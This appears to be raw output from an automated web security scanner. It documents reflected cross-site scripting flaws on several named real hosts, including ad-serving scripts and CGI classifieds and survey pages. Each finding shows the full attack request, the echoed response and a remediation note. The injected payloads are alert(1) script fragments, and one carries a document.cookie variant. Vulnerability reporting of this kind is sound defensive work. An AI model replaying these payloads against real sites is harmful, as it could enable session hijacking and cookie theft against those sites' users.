HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=526 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:00 GMT Connection: close Content-Length: 1987
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='fd682';alert(1)//8194c718852';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=fd682';alert(1)//8194c718852;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae34c"%3balert(1)//b23cf797565 was submitted in the q parameter. This input was echoed as ae34c";alert(1)//b23cf797565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=ae34c"%3balert(1)//b23cf797565&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1479B1099,2#702971|0,1,1;expires=Fri, 18 Feb 2011 18:00:59 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=527 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:59 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='ae34c";alert(1)//b23cf797565';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=ae34c";alert(1)//b23cf797565;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35817"%3balert(1)//c76b7e8cf54 was submitted in the $ parameter. This input was echoed as 35817";alert(1)//c76b7e8cf54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=35817"%3balert(1)//c76b7e8cf54&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:35817";alert(1)//c76b7e8cf54;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:52 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=534 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:52 GMT Connection: close Content-Length: 2038
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',35817";alert(1)//c76b7e8cf54';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,35817";alert(1)//c76b7e8cf54;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7468b'%3balert(1)//803ecb61dff was submitted in the $ parameter. This input was echoed as 7468b';alert(1)//803ecb61dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=7468b'%3balert(1)//803ecb61dff&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:7468b';alert(1)//803ecb61dff;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:53 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=533 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:53 GMT Connection: close Content-Length: 2038
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',7468b';alert(1)//803ecb61dff';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,7468b';alert(1)//803ecb61dff;z="+Math.random();}
4.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/bar/v16-401/d3/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb90e'-alert(1)-'40d04a4f8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?fb90e'-alert(1)-'40d04a4f8f9=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 942 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=249 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:50 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e4b"%3balert(1)//9f07af1dcbc was submitted in the q parameter. This input was echoed as 69e4b";alert(1)//9f07af1dcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=69e4b"%3balert(1)//9f07af1dcbc&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:49 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=48 Expires: Wed, 19 Jan 2011 18:01:37 GMT Date: Wed, 19 Jan 2011 18:00:49 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='69e4b";alert(1)//9f07af1dcbc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=69e4b";alert(1)//9f07af1dcbc;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59624'%3balert(1)//65aac50a934 was submitted in the q parameter. This input was echoed as 59624';alert(1)//65aac50a934 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=59624'%3balert(1)//65aac50a934&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:50 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=47 Expires: Wed, 19 Jan 2011 18:01:37 GMT Date: Wed, 19 Jan 2011 18:00:50 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='59624';alert(1)//65aac50a934';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=59624';alert(1)//65aac50a934;z="+Math.random();}
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload bc39f<script>alert(1)</script>6e8f0f5d54e was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=personalsbc39f<script>alert(1)</script>6e8f0f5d54e HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:43 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 532
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/personalsbc39f<script>alert(1)</script>6e8f0f5d54e.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s ...[SNIP]...
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload fe27a<script>alert(1)</script>35aefdde02f was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_lookfe27a<script>alert(1)</script>35aefdde02f&website=&language=&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:36 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 517
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/db/aad_lookfe27a<script>alert(1)</script>35aefdde02f.db at line 206 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a syntax ...[SNIP]...
The value of the language request parameter is copied into the HTML document as plain text between tags. The payload 5027a<script>alert(1)</script>12f2a4bf5c6 was submitted in the language parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=5027a<script>alert(1)</script>12f2a4bf5c6&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:41 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 531
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/language/5027a<script>alert(1)</script>12f2a4bf5c6/template.pl at line 174 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that ...[SNIP]...
The value of the website request parameter is copied into the HTML document as plain text between tags. The payload 39b59<script>alert(1)</script>d0e2bc9f57e was submitted in the website parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=39b59<script>alert(1)</script>d0e2bc9f57e&language=&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:40 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 515
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/websites/39b59<script>alert(1)</script>d0e2bc9f57e.cfg at line 441 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a synta ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 17c72<script>alert(1)</script>aed7ed93f68 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
